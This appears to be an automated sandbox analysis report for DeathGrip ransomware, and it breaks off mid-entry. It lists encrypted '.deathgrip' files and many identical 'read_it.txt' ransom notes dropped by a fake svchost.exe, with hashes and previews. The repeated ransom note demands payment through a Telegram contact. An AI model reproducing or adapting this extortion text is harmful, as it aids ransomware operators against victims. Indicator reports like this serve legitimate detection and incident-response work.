                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Wallet_8wekyb3d8bbwe\Settings\settings.dat.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8560
                                                          Entropy (8bit):7.976205633967385
                                                          Encrypted:false
                                                          SSDEEP:192:06bOE2IyIRc2QmeFtTLtBPonKB4sa/hsS8Dco3LJ:NymRcXTnDgnKB4sa/hMDz1
                                                          MD5:05A8CB2A03F42CEE4434D9FDC1C5F4C6
                                                          SHA1:A0455E76BC3C74D34CF0DFC0236D61986ED85577
                                                          SHA-256:CE6D01AC508E6E1E3DD8307FBABD60CCA0F90DB5631FD9E99F2D764722CD176C
                                                          SHA-512:ACFBB6ED1FF22A94E1C5F7C2196F39B0C6FACC8238F8AA0790C8C0FBCDAE7DFDDCC9F30705975C1F98C6860953934BBC2B3B8E941B59BD633E833689CC3D8B56
                                                          Malicious:false
                                                          Preview:.........AJo.,...-..u..I..=|..t.:.M...7..C9..L..ch..Pp....0..J......".{].DD......G..X.Y.4.?....i..c.j....".S.s...}.o.....=vK..R.L...v..D..s..-=`.<..9.....S.91;.oT.J.p)E.....n.ei.Q.Dq.....P..s.2 yu......p....DK...9....c./......XZ.^.....z.j(.l.{..).q.).....uo...p.yQW.X.D...>c..:."&...0.r./..N.^fM9U..L :.q.\T|...r..hr.. ..O..=..<Ny..N....f.......A.YL.O"a;.|...R._.......x.O.sQ.+n{vk...!.g......c...{..V+N..rze...+...q..q7:.8.@.....;.9.. ........w...u..U)+...U...B......-.|.(..fa.8..CT....S.Cp...C2.]Q.0.6...N5 (s'S.<..y..Q~5.|A8._..,p...X.+f.tO/.O(!*'.4-o..uw..W.jc.,]Q../\?......."....s...o.........e....f.._T...8.+....1...1.,X.e.V...R....\%}+..S<.jQ..DYD4....u"`...G.N..rc..sw.8.Z.t..Uk0.Z?|=d.. r[........*.c:...nCT!i...x.&U....)b8..0.\G..Gm.(w...5..{_P^....'X.~..@.0.k.n^.[Nu..6Q.#......T.'..l.....rpUG.E.d^l.i.V.....:..5{..(.u.M..q....)......b....2.....-R]<l.p.V m.h...SGHC.XD.{...`..A.-V..@........|.VXb\..........b.d.o...'5.....'....:,.c)....X;..|;Z.k...h..2

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\Settings\settings.dat.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8560
                                                          Entropy (8bit):7.977126323023209
                                                          Encrypted:false
                                                          SSDEEP:192:RhNoUa9XM6MpOqLTn/bHHn8d3Wyo6arqRQlB8S11nVMY2VR:R014OMTn/THn8d7harqml+OD8
                                                          MD5:3E6C4B1F85315B1EABFFCD67AF13AC09
                                                          SHA1:C4B6E85F204F6FB8A71B219A5B8C24DBEC312698
                                                          SHA-256:3748077E05CE8A8612E903D767FA011F0E61F76CB1FA17E1D2B14011D3803BDB
                                                          SHA-512:4C656126E55DDFB339080F653F1F379BDDE5B0C63ACCE1E1D3BF5A3978F8A182E1C350464AB651AF53974E8603EF265C1C6EA570EFA0911C46E3021CCD33E98C
                                                          Malicious:false
                                                          Preview:.........OLb...*.#.bw.... (...)..I}m.u..Z........I..;P...4...h.E.U2j.&Qr.N...+...W,`...o.o...mu.Z.{.He.1.W|....}.vy|.....Y.b4...F..+..6*k..;..v....._!......3v.V/.eb.%K..>.u..et..e..|...l..HX_.`).(....A...../..VL.....5.g...F#.V;.*...\:..f.....V....ek..7.vZ2qH...`&sQ............W9...L....a..H&c.g.~....zl.2.......vz...Nw.0.]..0...f.2...^C.B.S;L..T(.X:.i..r`S.g.b-j.,S.b.._..i..m/.}...`....r...3.....4..[.isV.o.nAh.....k.*..h.).Z=8...E".@.....%.K...N....:(.h!.8....c.}L......D>..gf.:.Lu.m...S(,...G4..~.....ka..xZ,{..e>.c.$.'..M.X...F.vO.ne7oI.5.{...}.'..Y.d3M.{.7.q.r..R ......{.....!..t..c,.`.X............/..cs.<.P.0@.|..rV4........R...Z.=.C..$.....d.:N. y.B.......A .j(v.psz.S..(.*....d.5.k......wpyRV>Y..u.....v.#0eN.=....R.fM. .e.]...D.,...B...@..zb...<...]...5...R0d..q.`.....;.....jM..c.&.;d........AO..............b.....l.]...........x.%.?L....d^M.u..Ba..(./B.$.iG?.'../...... g.S..6.o.:...en.@#.....%.(j}...H........AH;...a..o.R6uV...|....!..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.WebpImageExtension_8wekyb3d8bbwe\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\AppCache\8MH6DGLO\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\AppCache\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\INetCache\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\INetCookies\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\Settings\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\INetCache\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\INetCookies\ESE\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\INetHistory\BackgroundTransferApi\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\202914\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\280810\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
